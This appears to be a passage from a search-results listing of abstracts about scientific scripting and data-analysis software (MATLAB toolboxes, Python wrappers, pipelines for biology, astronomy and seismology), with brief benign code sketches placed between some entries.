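    for k = 1:numel(fn)
        fprintf(fid, '%s = %.4f\n', fn{k}, p.(fn{k}));
    end
    fclose(fid);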
A suite of MATLAB-based computational tools for automated analysis of COPAS Biosort data
Morton, Elizabeth; Lamitina, Todd
2010-01-01
Complex Object Parametric Analyzer and Sorter (COPAS) devices are large-object, fluorescence-capable flow cytometers used for high-throughput analysis of live model organisms, including Drosophila melanogaster, Caenorhabditis elegans, and zebrafish. The COPAS is especially useful in C. elegans high-throughput genome-wide RNA interference (RNAi) screens that utilize fluorescent reporters. However, analysis of data from such screens is relatively labor-intensive and time-consuming. Currently, there are no computational tools available to facilitate high-throughput analysis of COPAS data. We used MATLAB to develop algorithms (COPAquant, COPAmulti, and COPAcompare) to analyze different types of COPAS data. COPAquant reads single-sample files, filters and extracts values and value ratios for each file, and then returns a summary of the data. COPAmulti reads 96-well autosampling files generated with the ReFLX adapter, performs sample filtering, graphs features across both wells and plates, performs some common statistical measures for hit identification, and outputs results in graphical formats. COPAcompare performs a correlation analysis between replicate 96-well plates. For many parameters, thresholds may be defined through a simple graphical user interface (GUI), allowing our algorithms to meet a variety of screening applications. In a screen for regulators of stress-inducible GFP expression, COPAquant dramatically accelerated data analysis and allowed us to rapidly move from raw data to hit identification. Because the COPAS file structure is standardized and our MATLAB code is freely available, our algorithms should be extremely useful for analysis of COPAS data from multiple platforms and organisms. The MATLAB code is freely available at our web site (www.med.upenn.edu/lamitinalab/downloads.shtml). PMID:20569218
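The core gating-and-ratio step that COPAquant automates could be sketched like this in plain MATLAB; the file name, column order, and thresholds are assumptions rather than the actual COPAS export format.

    % Gate out debris and compute a size-normalized fluorescence ratio per object.
    d   = readmatrix('sample.txt');             % one object per row (assumed layout)
    tof = d(:,1); ext = d(:,2); gfp = d(:,3);   % time-of-flight, extinction, GFP (assumed columns)
    keep  = tof > 50 & ext > 20;                % user-chosen gating thresholds
    ratio = gfp(keep) ./ tof(keep);             % GFP normalized by object size
    fprintf('n = %d, median GFP/TOF = %.3g\n', nnz(keep), median(ratio));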
SWIFT MODELLER: a Java based GUI for molecular modeling.
Mathur, Abhinav; Shankaracharya; Vidyarthi, Ambarish S
2011-10-01
MODELLER is command-line-driven software that requires tedious formatting of inputs and the writing of Python scripts, which most people are not comfortable with. Also, the visualization of output becomes cumbersome due to verbose files. This makes the whole software protocol very complex and requires extensive study of MODELLER manuals and tutorials. Here we describe SWIFT MODELLER, a GUI that automates formatting, scripting and data extraction processes and presents them in an interactive way, making MODELLER much easier to use than before. The screens in SWIFT MODELLER are designed keeping homology modeling in mind, and their flow is a depiction of its steps. It eliminates the formatting of inputs, scripting processes and analysis of verbose output files through automation and makes pasting of the target sequence the only prerequisite. Jmol (a 3D structure visualization tool) has been integrated into the GUI, which opens and displays the protein data bank files created by the MODELLER software. All files required and created by the software are saved in a folder named after the work instance's date and time of execution. SWIFT MODELLER lowers the skill level required for the software through automation of many of the steps in the original software protocol, thus saving an enormous amount of time per instance and making MODELLER very easy to work with.
SCDU Testbed Automated In-Situ Alignment, Data Acquisition and Analysis
NASA Technical Reports Server (NTRS)
Werne, Thomas A.; Wehmeier, Udo J.; Wu, Janet P.; An, Xin; Goullioud, Renaud; Nemati, Bijan; Shao, Michael; Shen, Tsae-Pyng J.; Wang, Xu; Weilert, Mark A.;
2010-01-01
In the course of fulfilling its mandate, the Spectral Calibration Development Unit (SCDU) testbed for SIM-Lite produces copious amounts of raw data. To effectively spend time attempting to understand the science driving the data, the team devised computerized automations to limit the time spent bringing the testbed to a healthy state and commanding it, and instead focus on analyzing the processed results. We developed a multi-layered scripting language that emphasized the scientific experiments we conducted, which drastically shortened our experiment scripts, improved their readability, and all but eliminated testbed operator errors. In addition to scientific experiment functions, we also developed a set of automated alignments that bring the testbed up to a well-aligned state with little more than the push of a button. These scripts were written in the scripting language, and in Matlab via an interface library, allowing all members of the team to augment the existing scripting language with complex analysis scripts. To keep track of these results, we created an easily parseable state log in which we logged both the state of the testbed and relevant metadata. Finally, we designed a distributed processing system that allowed us to farm lengthy analyses to a collection of client computers which reported their results in a central log. Since these logs were parseable, we wrote query scripts that gave us an effortless way to compare results collected under different conditions. This paper serves as a case study, detailing the motivating requirements for the decisions we made and explaining the implementation process.
Reportable STDs in Young People 15-24 Years of Age, by State
... include: line graphs by year; pie charts for sex; bar charts by state and country; bar charts for age, race/ethnicity, and transmission ... Quicktime file, RealPlayer file, Text file ...
AlleleCoder: a PERL script for coding codominant polymorphism data for PCA analysis
USDA-ARS?s Scientific Manuscript database
A useful biological interpretation of diploid heterozygotes is in terms of the dose of the common allele (0, 1 or 2 copies). We have developed a PERL script that converts FASTA files into coded spreadsheets suitable for Principal Component Analysis (PCA). In combination with R and R Commander, two- ...
ORPC RivGen controller performance raw data - Igiugig 2015
McEntee, Jarlath
2015-12-18
Contains raw data for operations of Ocean Renewable Power Company (ORPC) RivGen Power System in Igiugig 2015 in Matlab data file format. Two data files capture the data and timestamps for data, including power in, voltage, rotation rate, and velocity.
The Waveform Suite: A robust platform for accessing and manipulating seismic waveforms in MATLAB
NASA Astrophysics Data System (ADS)
Reyes, C. G.; West, M. E.; McNutt, S. R.
2009-12-01
The Waveform Suite, developed at the University of Alaska Geophysical Institute, is an open-source collection of MATLAB classes that provide a means to import, manipulate, display, and share waveform data while ensuring integrity of the data and stability for programs that incorporate them. Data may be imported from a variety of sources, such as Antelope, Winston databases, SAC files, SEISAN, .mat files, or other user-defined file formats. The waveforms being manipulated in MATLAB are isolated from their stored representations, relieving the overlying programs from the responsibility of understanding the specific format in which data is stored or retrieved. The waveform class provides an object oriented framework that simplifies manipulations to waveform data. Playing with data becomes easier because the tedious aspects of data manipulation have been automated. The user is able to change multiple waveforms simultaneously using standard mathematical operators and other syntactically familiar functions. Unlike MATLAB structs or workspace variables, the data stored within waveform class objects are protected from modification, and instead are accessed through standardized functions, such as get and set; these are already familiar to users of MATLAB’s graphical features. This prevents accidental or nonsensical modifications to the data, which in turn simplifies troubleshooting of complex programs. Upgrades to the internal structure of the waveform class are invisible to applications which use it, making maintenance easier. We demonstrate the Waveform Suite’s capabilities on seismic data from Okmok and Redoubt volcanoes. Years of data from Okmok were retrieved from Antelope and Winston databases. Using the Waveform Suite, we built a tremor-location program. Because the program was built on the Waveform Suite, modifying it to operate on real-time data from Redoubt involved only minimal code changes. The utility of the Waveform Suite as a foundation for large developments is demonstrated with the Correlation Toolbox for MATLAB. This mature package contains 50+ codes for carrying out various types of waveform correlation analyses (multiplet analysis, clustering, interferometry, …). This package is greatly strengthened by delegating numerous book-keeping and signal processing tasks to the underlying Waveform Suite. The Waveform Suite’s built-in tools for searching arbitrary directory/file structures are demonstrated with matched video and audio from the recent eruption of Redoubt Volcano. These tools were used to find subsets of photo images corresponding to specific seismic traces. Using Waveform’s audio file routines, matched video and audio were assembled to produce outreach-quality eruption products. The Waveform Suite is not designed as a ready-to-go replacement for more comprehensive packages such as SAC or AH. Rather, it is a suite of classes which provide core time series functionality in a MATLAB environment. It is designed to be a more robust alternative to the numerous ad hoc MATLAB formats that exist. Complex programs may be created upon the Waveform Suite’s framework, while existing programs may be modified to take advantage of the Waveform Suite’s capabilities.
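A hedged sketch of the get/set pattern described above, assuming a waveform object w has already been loaded from one of the supported sources; the property names shown ('freq', 'data') are illustrative.

    % Inspect and modify a waveform object through its accessor functions.
    fs = get(w, 'freq');                 % sampling rate stored with the trace
    d  = get(w, 'data');                 % the underlying sample vector
    w2 = set(w, 'data', detrend(d));     % write modified samples back into the protected object
    w2 = w2 - mean(get(w2, 'data'));     % overloaded operators act on whole waveforms
    plot(w2)                             % class-aware plotting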
DOE Office of Scientific and Technical Information (OSTI.GOV)
2012-09-11
While an organized source of reference information on PV performance modeling is certainly valuable, there is nothing to match the availability of actual examples of modeling algorithms being used in practice. To meet this need, Sandia has developed a PV performance modeling toolbox (PV_LIB) for Matlab. It contains a set of well-documented, open source functions and example scripts showing the functions being used in practical examples. This toolbox is meant to help make the multi-step process of modeling a PV system more transparent and provide the means for model users to validate and understand the models they use and/or develop. It is fully integrated into Matlab's help and documentation utilities. The PV_LIB Toolbox provides more than 30 functions that are sorted into four categories.
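As an illustration of the toolbox's calling style (a sketch only; exact argument lists may differ between PV_LIB versions), a few functions can be chained to get the solar position for a site over one day:

    % Solar position for Albuquerque on the summer solstice (illustrative values).
    Location = pvl_makelocationstruct(35.05, -106.54, 1619);              % lat, lon, altitude [m]
    Time     = pvl_maketimestruct(datenum(2012, 6, 21, 0:23, 0, 0), -7);  % hourly stamps, UTC offset
    [SunAz, SunEl] = pvl_ephemeris(Time, Location);
    plot(Time.hour, SunEl); xlabel('Hour of day'); ylabel('Sun elevation (deg)')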
Host-Nation Operations: Soldier Training on Governance (HOST-G) Training Support Package
2011-07-01
restricted this webpage from running scripts or ActiveX controls that could access your computer. Click here for options…” • If this occurs, select that...scripts and ActiveX controls can be useful, but active content might also harm your computer. Are you sure you want to let this file run active
VizieR Online Data Catalog: RefleX : X-ray-tracing code (Paltani+, 2017)
NASA Astrophysics Data System (ADS)
Paltani, S.; Ricci, C.
2017-11-01
We provide here the RefleX executable, for both Linux and MacOSX, together with the User Manual and an example script file and output file. Running (for instance) reflex_linux will produce the file reflex.out. Note that the results may differ slightly depending on the OS, because of slight differences in some implementations of numerical computations. The differences are scientifically meaningless. (5 data files).
Summary of Documentation for DYNA3D-ParaDyn's Software Quality Assurance Regression Test Problems
DOE Office of Scientific and Technical Information (OSTI.GOV)
Zywicz, Edward
The Software Quality Assurance (SQA) regression test suite for DYNA3D (Zywicz and Lin, 2015) and ParaDyn (DeGroot, et al., 2015) currently contains approximately 600 problems divided into 21 suites, and is a required component of ParaDyn’s SQA plan (Ferencz and Oliver, 2013). The regression suite allows developers to ensure that software modifications do not unintentionally alter the code response. The entire regression suite is run prior to permanently incorporating any software modification or addition. When code modifications alter test problem results, the specific cause must be determined and fully understood before the software changes and revised test answers can be incorporated. The regression suite is executed on LLNL platforms using a Python script and an associated data file. The user specifies the DYNA3D or ParaDyn executable, number of processors to use, test problems to run, and other options to the script. The data file details how each problem and its answer extraction scripts are executed. For each problem in the regression suite there exists an input deck, an eight-processor partition file, an answer file, and various extraction scripts. These scripts assemble a temporary answer file in a specific format from the simulation results. The temporary and stored answer files are compared to a specific level of numerical precision, and when differences are detected the test problem is flagged as failed. Presently, numerical results are stored and compared to 16 digits. At this accuracy level different processor types, compilers, number of partitions, etc. impact the results to various degrees. Thus, for consistency purposes the regression suite is run with ParaDyn using 8 processors on machines with a specific processor type (currently the Intel Xeon E5530 processor). For non-parallel regression problems, i.e., the two XFEM problems, DYNA3D is used instead. When environments or platforms change, executables using the current source code and the new resource are created and the regression suite is run. If differences in answers arise, the new answers are retained provided that the differences are inconsequential. This bootstrap approach allows the test suite answers to evolve in a controlled manner with a high level of confidence. Developers also run the entire regression suite with (serial) DYNA3D. While these results normally differ from the stored (parallel) answers, abnormal termination or wildly different values are strong indicators of potential issues.
MedlinePlus produces XML data sets that you are welcome to download and use. If you have questions about the MedlinePlus XML files, please contact us. For additional sources of MedlinePlus data in XML format, visit our Web service page, ...
Grinter, Sam Z; Yan, Chengfei; Huang, Sheng-You; Jiang, Lin; Zou, Xiaoqin
2013-08-26
In this study, we use the recently released 2012 Community Structure-Activity Resource (CSAR) data set to evaluate two knowledge-based scoring functions, ITScore and STScore, and a simple force-field-based potential (VDWScore). The CSAR data set contains 757 compounds, most with known affinities, and 57 crystal structures. With the help of the script files for docking preparation, we use the full CSAR data set to evaluate the performances of the scoring functions on binding affinity prediction and active/inactive compound discrimination. The CSAR subset that includes crystal structures is used as well, to evaluate the performances of the scoring functions on binding mode and affinity predictions. Within this structure subset, we investigate the importance of accurate ligand and protein conformational sampling and find that the binding affinity predictions are less sensitive to non-native ligand and protein conformations than the binding mode predictions. We also find the full CSAR data set to be more challenging in making binding mode predictions than the subset with structures. The script files used for preparing the CSAR data set for docking, including scripts for canonicalization of the ligand atoms, are offered freely to the academic community.
Activate/Inhibit KGCS Gateway via Master Console EIC Pad-B Display
NASA Technical Reports Server (NTRS)
Ferreira, Pedro Henrique
2014-01-01
My internship consisted of two major projects for the Launch Control System. The purpose of the first project was to implement the Application Control Language (ACL) to Activate Data Acquisition (ADA) and Inhibit Data Acquisition (IDA) for the Kennedy Ground Control Sub-Systems (KGCS) Gateway, to update the existing Pad-B End Item Control (EIC) Display to program the ADA and IDA buttons with the new ACL, and to test and release the ACL Display. The second project consisted of unit testing all of the Application Services Framework (ASF) by March 21st. The XmlFileReader was unit tested and reached 100% coverage. The XmlFileReader class is used to grab information from XML files and use it to initialize elements in the other framework components by using the Xerces C++ XML Parser, which is open-source, commercial off-the-shelf software. The ScriptThread was also tested. ScriptThread manages the creation and activation of script threads. A large amount of the time was used in initializing the environment, learning how to set up unit tests, and getting familiar with the specific segments of the project that were assigned to us.
CFS MATLAB toolbox: An experiment builder for continuous flash suppression (CFS) task.
Nuutinen, Mikko; Mustonen, Terhi; Häkkinen, Jukka
2017-09-15
CFS toolbox is an open-source collection of MATLAB functions that utilizes PsychToolbox-3 (PTB-3). It is designed to allow a researcher to create and run continuous flash suppression experiments using a variety of experimental parameters (i.e., stimulus types and locations, noise characteristics, and experiment window settings). In a CFS experiment, one of the eyes at a time is presented with a dynamically changing noise pattern, while the other eye is concurrently presented with a static target stimulus, such as a Gabor patch. Due to the strong interocular suppression created by the dominant noise pattern mask, the target stimulus is rendered invisible for an extended duration. Very little knowledge of MATLAB is required for using the toolbox; experiments are generated by modifying csv files with the required parameters, and result data are output to text files for further analysis. The open-source code is available on the project page under a Creative Commons License ( http://www.mikkonuutinen.arkku.net/CFS_toolbox/ and https://bitbucket.org/mikkonuutinen/cfs_toolbox ).
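A rough sketch of the csv-driven workflow (the file name and column names are invented for illustration and are not the toolbox's actual parameter schema):

    % Read a per-trial parameter file and walk through the planned trials.
    params = readtable('cfs_experiment.csv');   % one row per trial (assumed layout)
    for i = 1:height(params)
        tgt  = params.targetImage{i};           % e.g., path to a Gabor or face image
        side = params.targetEye{i};             % 'left' or 'right'
        dur  = params.maxDuration(i);           % seconds before the trial times out
        fprintf('Trial %d: %s to %s eye, %.1f s\n', i, tgt, side, dur);
    end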
Simplifying Chandra aperture photometry with srcflux
NASA Astrophysics Data System (ADS)
Glotfelty, Kenny
2014-11-01
This poster will highlight some of the features of the srcflux script in CIAO. This script combines many threads and tools together to compute photometric properties for sources: counts, rates, various fluxes, and confidence intervals or upper limits. Beginning and casual X-ray astronomers greatly benefit from the simple interface: just specify the event file and a celestial location, while power-users and X-ray astronomy experts can take advantage of the all the parameters to automatically produce catalogs for entire fields. Current limitations and future enhancements of the script will also be presented.
Early Market Site Identification Data
Levi Kilcher
2016-04-01
This data was compiled for the 'Early Market Opportunity Hot Spot Identification' project. The data and scripts included were used in the 'MHK Energy Site Identification and Ranking Methodology' Reports (Part I: Wave, NREL Report #66038; Part II: Tidal, NREL Report #66079). The Python scripts will generate, from the Excel data files, a set of results, some of which were described in the reports. The scripts depend on the 'score_site' package, and the score_site package depends on a number of standard Python libraries (see the score_site install instructions).
Charming Users into Scripting CIAO with Python
NASA Astrophysics Data System (ADS)
Burke, D. J.
2011-07-01
The Science Data Systems group of the Chandra X-ray Center provides a number of scripts and Python modules that extend the capabilities of CIAO. Experience in converting the existing scripts—written in a variety of languages such as bash, csh/tcsh, Perl and S-Lang—to Python, and conversations with users, led to the development of the ciao_contrib.runtool module. This allows users to easily run CIAO tools from Python scripts, and utilizes the metadata provided by the parameter-file system to create an API that provides the flexibility and safety guarantees of the command-line. The module is provided to the user community and is being used within our group to create new scripts.
VizieR Online Data Catalog: Planetary atmosphere radiative transport code (Garcia Munoz+ 2015)
NASA Astrophysics Data System (ADS)
Garcia Munoz, A.; Mills, F. P.
2014-08-01
Files are: * readme.txt * Input files: INPUT_hazeL.txt, INPUT_L13.txt, INPUT_L60.txt; they contain explanations of the input parameters. Copy INPUT_XXXX.txt into INPUT.dat to execute some of the examples described in the reference. * Files with scattering matrix properties: phF_hazeL.txt, phF_L13.txt, phF_L60.txt * Script for compilation in GFortran (myscript) (10 data files).
Simplifying and enhancing the use of PyMOL with horizontal scripts
2016-01-01
Abstract Scripts are used in PyMOL to exert precise control over the appearance of the output and to ease remaking similar images at a later time. We developed horizontal scripts to ease script development. A horizontal script makes a complete scene in PyMOL like a traditional vertical script. The commands in a horizontal script are separated by semicolons. These scripts are edited interactively on the command line with no need for an external text editor. This simpler workflow accelerates script development. In using PyMOL, the illustration of a molecular scene requires an 18-element matrix of viewport settings. The default format spans several lines and is laborious to manually reformat onto one line. This default format prevents the fast assembly of horizontal scripts that can reproduce a molecular scene. We solved this problem by writing a function that displays the settings on one line in a compact format suitable for horizontal scripts. We also demonstrate the mapping of aliases to horizontal scripts. Many aliases can be defined in a single script file, which can be useful for applying custom molecular representations to any structure. We also redefined horizontal scripts as Python functions to enable the use of the help function to print documentation about an alias to the command history window. We discuss how these methods of using horizontal scripts both simplify and enhance the use of PyMOL in research and education. PMID:27488983
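As an illustration of the horizontal-script idea, the sketch below drives PyMOL through its Python interface (pymol.cmd); the PDB code 1ubq, the color, and the rounding are arbitrary choices for the example, not taken from the article.

```python
# Runs inside PyMOL's Python interpreter (e.g. the built-in command line or "pymol -cq script.py").
from pymol import cmd

# A one-line, semicolon-separated "horizontal" scene; 1ubq is only an illustrative PDB ID.
cmd.do("fetch 1ubq; hide everything; show cartoon; color skyblue; orient")

# get_view() returns the 18-element view matrix discussed above; printing it as a single
# tuple keeps it compact enough to paste back into a horizontal script.
print(tuple(round(v, 4) for v in cmd.get_view()))
```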
2008-07-07
analyzing multivariate data sets. The system was developed using the Java Development Kit (JDK) version 1.5; and it yields interactive performance on a... script and captures output from the MATLAB’s “regress” and “stepwisefit” utilities that perform simple and stepwise regression, respectively. The MATLAB...Statistical Association, vol. 85, no. 411, pp. 664–675, 1990. [9] H. Hauser, F. Ledermann, and H. Doleisch, “ Angular brushing of extended parallel coordinates
Oostenveld, Robert; Fries, Pascal; Maris, Eric; Schoffelen, Jan-Mathijs
2011-01-01
This paper describes FieldTrip, an open source software package that we developed for the analysis of MEG, EEG, and other electrophysiological data. The software is implemented as a MATLAB toolbox and includes a complete set of consistent and user-friendly high-level functions that allow experimental neuroscientists to analyze experimental data. It includes algorithms for simple and advanced analysis, such as time-frequency analysis using multitapers, source reconstruction using dipoles, distributed sources and beamformers, connectivity analysis, and nonparametric statistical permutation tests at the channel and source level. The implementation as toolbox allows the user to perform elaborate and structured analyses of large data sets using the MATLAB command line and batch scripting. Furthermore, users and developers can easily extend the functionality and implement new algorithms. The modular design facilitates the reuse in other software packages.
Three-dimensional rendering of segmented object using matlab - biomed 2010.
Anderson, Jeffrey R; Barrett, Steven F
2010-01-01
The three-dimensional rendering of microscopic objects is a difficult and challenging task that often requires specialized image processing techniques. Previous work has been described of a semi-automatic segmentation process of fluorescently stained neurons collected as a sequence of slice images with a confocal laser scanning microscope. Once properly segmented, each individual object can be rendered and studied as a three-dimensional virtual object. This paper describes the work associated with the design and development of Matlab files to create three-dimensional images from the segmented object data previously mentioned. Part of the motivation for this work is to integrate both the segmentation and rendering processes into one software application, providing a seamless transition from the segmentation tasks to the rendering and visualization tasks. Previously these tasks were accomplished on two different computer systems, windows and Linux. This transition basically limits the usefulness of the segmentation and rendering applications to those who have both computer systems readily available. The focus of this work is to create custom Matlab image processing algorithms for object rendering and visualization, and merge these capabilities to the Matlab files that were developed especially for the image segmentation task. The completed Matlab application will contain both the segmentation and rendering processes in a single graphical user interface, or GUI. This process for rendering three-dimensional images in Matlab requires that a sequence of two-dimensional binary images, representing a cross-sectional slice of the object, be reassembled in a 3D space, and covered with a surface. Additional segmented objects can be rendered in the same 3D space. The surface properties of each object can be varied by the user to aid in the study and analysis of the objects. This inter-active process becomes a powerful visual tool to study and understand microscopic objects.
Pybel: a Python wrapper for the OpenBabel cheminformatics toolkit
O'Boyle, Noel M; Morley, Chris; Hutchison, Geoffrey R
2008-01-01
Background Scripting languages such as Python are ideally suited to common programming tasks in cheminformatics such as data analysis and parsing information from files. However, for reasons of efficiency, cheminformatics toolkits such as the OpenBabel toolkit are often implemented in compiled languages such as C++. We describe Pybel, a Python module that provides access to the OpenBabel toolkit. Results Pybel wraps the direct toolkit bindings to simplify common tasks such as reading and writing molecular files and calculating fingerprints. Extensive use is made of Python iterators to simplify loops such as that over all the molecules in a file. A Pybel Molecule can be easily interconverted to an OpenBabel OBMol to access those methods or attributes not wrapped by Pybel. Conclusion Pybel allows cheminformaticians to rapidly develop Python scripts that manipulate chemical information. It is open source, available cross-platform, and offers the power of the OpenBabel toolkit to Python programmers. PMID:18328109
Pybel: a Python wrapper for the OpenBabel cheminformatics toolkit.
O'Boyle, Noel M; Morley, Chris; Hutchison, Geoffrey R
2008-03-09
Scripting languages such as Python are ideally suited to common programming tasks in cheminformatics such as data analysis and parsing information from files. However, for reasons of efficiency, cheminformatics toolkits such as the OpenBabel toolkit are often implemented in compiled languages such as C++. We describe Pybel, a Python module that provides access to the OpenBabel toolkit. Pybel wraps the direct toolkit bindings to simplify common tasks such as reading and writing molecular files and calculating fingerprints. Extensive use is made of Python iterators to simplify loops such as that over all the molecules in a file. A Pybel Molecule can be easily interconverted to an OpenBabel OBMol to access those methods or attributes not wrapped by Pybel. Pybel allows cheminformaticians to rapidly develop Python scripts that manipulate chemical information. It is open source, available cross-platform, and offers the power of the OpenBabel toolkit to Python programmers.
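A minimal usage sketch of the documented Pybel interface follows; the file name molecules.sdf is a placeholder.

```python
import pybel  # in recent Open Babel releases: from openbabel import pybel

# Iterate over every molecule in an SDF file (file name is illustrative)
for mol in pybel.readfile("sdf", "molecules.sdf"):
    print(mol.title, mol.molwt)          # descriptors exposed as attributes
    fp = mol.calcfp()                    # fingerprint for similarity searching
    smiles = mol.write("smi").strip()    # convert to another format in memory
    obmol = mol.OBMol                    # drop down to the underlying OpenBabel OBMol
```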
NASA Technical Reports Server (NTRS)
Ullman, Richard; Bane, Bob; Yang, Jingli
2008-01-01
A shell script has been written as a means of automatically making HDF-EOS-formatted data sets available via the World Wide Web. ("HDF-EOS" and variants thereof are defined in the first of the two immediately preceding articles.) The shell script chains together some software tools developed by the Data Usability Group at Goddard Space Flight Center to perform the following actions: Extract metadata in Object Definition Language (ODL) from an HDF-EOS file, Convert the metadata from ODL to Extensible Markup Language (XML), Reformat the XML metadata into human-readable Hypertext Markup Language (HTML), Publish the HTML metadata and the original HDF-EOS file to a Web server and an Open-source Project for a Network Data Access Protocol (OPeNDAP) server computer, and Reformat the XML metadata and submit the resulting file to the EOS Clearinghouse, which is a Web-based metadata clearinghouse that facilitates searching for, and exchange of, Earth-Science data.
TagDigger: user-friendly extraction of read counts from GBS and RAD-seq data.
Clark, Lindsay V; Sacks, Erik J
2016-01-01
In genotyping-by-sequencing (GBS) and restriction site-associated DNA sequencing (RAD-seq), read depth is important for assessing the quality of genotype calls and estimating allele dosage in polyploids. However, existing pipelines for GBS and RAD-seq do not provide read counts in formats that are both accurate and easy to access. Additionally, although existing pipelines allow previously-mined SNPs to be genotyped on new samples, they do not allow the user to manually specify a subset of loci to examine. Pipelines that do not use a reference genome assign arbitrary names to SNPs, making meta-analysis across projects difficult. We created the software TagDigger, which includes three programs for analyzing GBS and RAD-seq data. The first script, tagdigger_interactive.py, rapidly extracts read counts and genotypes from FASTQ files using user-supplied sets of barcodes and tags. Input and output is in CSV format so that it can be opened by spreadsheet software. Tag sequences can also be imported from the Stacks, TASSEL-GBSv2, TASSEL-UNEAK, or pyRAD pipelines, and a separate file can be imported listing the names of markers to retain. A second script, tag_manager.py, consolidates marker names and sequences across multiple projects. A third script, barcode_splitter.py, assists with preparing FASTQ data for deposit in a public archive by splitting FASTQ files by barcode and generating MD5 checksums for the resulting files. TagDigger is open-source and freely available software written in Python 3. It uses a scalable, rapid search algorithm that can process over 100 million FASTQ reads per hour. TagDigger will run on a laptop with any operating system, does not consume hard drive space with intermediate files, and does not require programming skill to use.
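The archiving step mentioned above (MD5 checksums for the split FASTQ files) can be illustrated with a generic Python sketch using only the standard library; this is not TagDigger's own code and the glob pattern is a placeholder.

```python
import hashlib
from pathlib import Path

def md5sum(path, chunk_size=2**20):
    """Stream a (possibly large) FASTQ file through MD5 without loading it into memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

for fastq in sorted(Path(".").glob("*.fastq")):   # placeholder pattern for the split files
    print(md5sum(fastq), fastq.name)
```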
PsyScript: a Macintosh application for scripting experiments.
Bates, Timothy C; D'Oliveiro, Lawrence
2003-11-01
PsyScript is a scriptable application allowing users to describe experiments in Apple's compiled high-level object-oriented AppleScript language, while still supporting millisecond or better within-trial event timing (delays can be in milliseconds or refresh-based, and PsyScript can wait on external I/O, such as eye movement fixations). Because AppleScript is object oriented and system-wide, PsyScript experiments support complex branching, code reuse, and integration with other applications. Included AppleScript-based libraries support file handling and stimulus randomization and sampling, as well as more specialized tasks, such as adaptive testing. Advanced features include support for the BBox serial port button box, as well as a low-cost USB-based digital I/O card for millisecond timing, recording of any number and types of responses within a trial, novel responses, such as graphics tablet drawing, and use of the Macintosh sound facilities to provide an accurate voice key, saving voice responses to disk, scriptable image creation, support for flicker-free animation, and gaze-dependent masking. The application is open source, allowing researchers to enhance the feature set and verify internal functions. Both the application and the source are available for free download at www.maccs.mq.edu.au/~tim/psyscript/.
2013-08-05
preliminary design phase the operational modes defined here will be implemented in MATLAB/Simulink/Stateflow and will be used as a master mission script ...3. the detumble mode during which the nanosat uses the rate gyros of the IMU and its RCS thrusters to cancel the angular rates about each axis...the mode is exited nominally if the angular rate about each axis has been brought below a certain threshold, the largest solar panel has been pointed
2011-06-01
effective way-point navigation algorithm that interfaced with a Java based graphical user interface (GUI), written by Uzun, for a robot named Bender [2...the angular acceleration, θ̈, or angular rate, θ̇. When considering a joint driven by an electric motor, the inertia and friction can be divided into...interactive simulations that can receive input from user controls, scripts, and other applications, such as Excel and MATLAB. One drawback is that the
Loudspeaker equalization for auditory research.
MacDonald, Justin A; Tran, Phuong K
2007-02-01
The equalization of loudspeaker frequency response is necessary to conduct many types of well-controlled auditory experiments. This article introduces a program that includes functions to measure a loudspeaker's frequency response, design equalization filters, and apply the filters to a set of stimuli to be used in an auditory experiment. The filters can compensate for both magnitude and phase distortions introduced by the loudspeaker. A MATLAB script is included in the Appendix to illustrate the details of the equalization algorithm used in the program.
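The program described here is MATLAB-based; the following Python/NumPy sketch only illustrates the core idea of a regularized inverse filter computed from a measured impulse response, with illustrative parameter values rather than the article's algorithm.

```python
import numpy as np

def design_inverse_filter(impulse_response, n_fft=4096, reg=1e-3):
    """Regularized magnitude/phase inversion of a measured loudspeaker impulse response.
    A minimal sketch; a real equalizer would also band-limit the inversion and window the result."""
    H = np.fft.rfft(impulse_response, n_fft)
    H_inv = np.conj(H) / (np.abs(H) ** 2 + reg)      # regularization avoids blowing up spectral nulls
    h_inv = np.fft.irfft(H_inv, n_fft)
    return np.roll(h_inv, n_fft // 2)                # shift so the filter is roughly causal

# stimulus_eq = np.convolve(stimulus, design_inverse_filter(measured_ir), mode="full")
```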
SSC Geopositional Assessment of the Advanced Wide Field Sensor
NASA Technical Reports Server (NTRS)
Ross, Kenton
2007-01-01
The objective is to provide independent verification of IRS geopositional accuracy claims and of the internal geopositional characterization provided by Lutes (2005). Six sub-scenes (quads) were assessed, three from each AWiFS camera. Check points were manually matched to digital orthophoto quarter quadrangle (DOQQ) references (assumed accuracy approx. 5 m RMSE). Check points were selected to meet or exceed the Federal Geographic Data Committee's guidelines. ESRI ArcGIS was used for data collection and SSC-written MATLAB scripts were used for data analysis.
2015-04-23
blade geometry parameters the TPL design 9 tool was initiated by running the MATLAB script (*.m) Main_SpeedLine_Auto. Main_SpeedLine_Auto...SolidWorks for solid model generation of the blade shapes. Computational Analysis With solid models generated of the gas-path air wedge, automated...287 mm (11.3 in) Constrained by existing TCR geometry Number of Passages 12 None A blade tip-down design approach was used. The outputs of the
Developing a Complete and Effective ACT-R Architecture
2008-01-01
of computational primitives, as contrasted with the predominant “one-off” and “grab-bag” cognitive models in the field. These architectures have...transport/semaphore protocols connected via a glue script. Both protocols rely on the fact that file rename and file remove operations are atomic...the Trial Log file until just prior to processing the next input request. Thus, to perform synchronous identifications it is necessary to run an
Femtosecond laser fabrication of fiber based optofluidic platform for flow cytometry applications
NASA Astrophysics Data System (ADS)
Serhatlioglu, Murat; Elbuken, Caglar; Ortac, Bulend; Solmaz, Mehmet E.
2017-02-01
Miniaturized optofluidic platforms play an important role in bio-analysis, detection and diagnostic applications. The advantages of such miniaturized devices are extremely low sample requirement, low cost development and rapid analysis capabilities. Fused silica is advantageous for optofluidic systems due to properties such as being chemically inert, mechanically stable, and optically transparent to a wide spectrum of light. As a three dimensional manufacturing method, femtosecond laser scanning followed by chemical etching shows great potential to fabricate glass based optofluidic chips. In this study, we demonstrate fabrication of an all-fiber based, optofluidic flow cytometer in fused silica glass by femtosecond laser machining. 3D particle focusing was achieved through a straightforward planar chip design with two separately fabricated fused silica glass slides thermally bonded together. Bioparticles in a fluid stream pass through an optical interrogation region specifically designed to accommodate a 405 nm single-mode fiber laser source and two multi-mode collection fibers for detection of forward scattering (FSC) and side scattering (SSC) signals. Detected signal data were collected with an oscilloscope and post-processed with a MATLAB script file. We were able to count events at rates over 4000 events/sec and obtain the size distribution of 5.95 μm monodisperse polystyrene beads using the FSC and SSC signals. Our platform shows promise for optical and fluidic miniaturization of flow cytometry systems.
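A hedged sketch of the kind of post-processing described (counting scattering pulses in the recorded trace) is shown below in Python; the threshold, pulse separation, and variable names are assumptions, and the authors' own analysis was done with a MATLAB script.

```python
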